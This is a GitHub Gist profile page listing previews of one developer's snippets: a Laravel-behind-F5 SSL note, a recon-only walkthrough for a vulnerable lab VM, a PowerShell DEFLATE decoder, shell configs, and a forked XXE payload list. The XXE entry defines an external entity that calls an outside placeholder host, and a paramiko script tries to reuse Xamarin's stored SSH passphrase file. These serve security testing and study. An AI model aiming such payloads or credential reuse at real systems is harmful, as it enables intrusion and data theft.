Skip to content

Instantly share code, notes, and snippets.

View vortexau's full-sized avatar

vortex (James McLean) vortexau

View GitHub Profile
vortexau /
Last active March 16, 2017 08:13
Laravel 5.1 Handling SSL and NonSSL connections

Laravel 5.1 SSL/TLS & Non-TLS interface.


A Laravel 5.1 Application behind a BigIP F5 load-balancer applicance, which performed the SSL termination. The traffic from F5 to Laravel is only over Port 80 (internal 'secure' network) and Laravel itself thinks it is insecure, and thus all URLs to internal resources were 'http'. We also wanted to maintain the ability to serve certain unauthenticated content over HTTP.

These F5 load-balancers can roll all connections up to HTTPS, however in this instance we did not wish to perform this as the Laravel application is designed to intercept connections for another decommissioned application which served SSL and Non-SSL connections.


  1. An iRule was added to the Virtual Server on the F5 device to include a 'HTTPS' 'on' header when the request to the F5 device was HTTPS

Keybase proof

I hereby claim:

  • I am vortexau on github.
  • I am vortex ( on keybase.
  • I have a public key whose fingerprint is 6352 BBF9 D34C 198D 0B05 8C05 F79D 4BF6 C555 4446

To claim this, I am signing this object:

vortexau /
Last active March 12, 2017 00:49
Ew Skuzzy - Walkthrough

Quick Walkthrough for Ew Skuzzy!

  1. Boot the VM, on virtualbox. IP Address assigned via DHCP will be displayed on the login screen in the vm display.
  2. Scan the IP with Nmap. 3 ports visible.
  • ssh
  • http
  • iscsi
  1. Skip SSH the VM has accounts which work with passwords, but I guarantee the passwords are NOT brute-forceable in shorter time than the designed path-to-root :).
  2. Scan the HTTP Server with 'dirb' and 'common.txt', and enjoy what you find.
  • Direct all hate to /dev/null, I'm just messing with you :p
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
# Custom hosts completion from included SSH configs:
zstyle -e ':completion:*:hosts' hosts 'reply=(
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ }
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config.d/* 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
# The last line above supports reading from files inside a local SSH configuration directory. It pulls

Version 1

Debian installed as VM. Single Struts app, just to test the install process.

apt-get update && apt-get -y upgrade

apt-get install tomcat8 maven

cd to project directory

vortexau / XXE_payloads
Created October 31, 2017 01:05 — forked from staaldraad/XXE_payloads
XXE Payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
vortexau /
Created November 7, 2017 00:12
Xamarin Mac Host SSH Connection
#!/usr/bin/env python
import paramiko
import base64
# Run in /mnt/c/Users/<username>/AppData/Local/Xamarin/MonoTouch
# Unfortunately this does NOT work yet, as I do not understand the passphrase.key
# file contents entirely (it appears to be bytes inside the base64 encoded string)
# and how to use it as the SSH key.
with open("passphrase.key", 'r') as file:
vortexau / google-copy.js
Created June 19, 2019 21:31 — forked from tomnomnom/google-copy.js
Bookmarklet to copy URLs from a Google search results page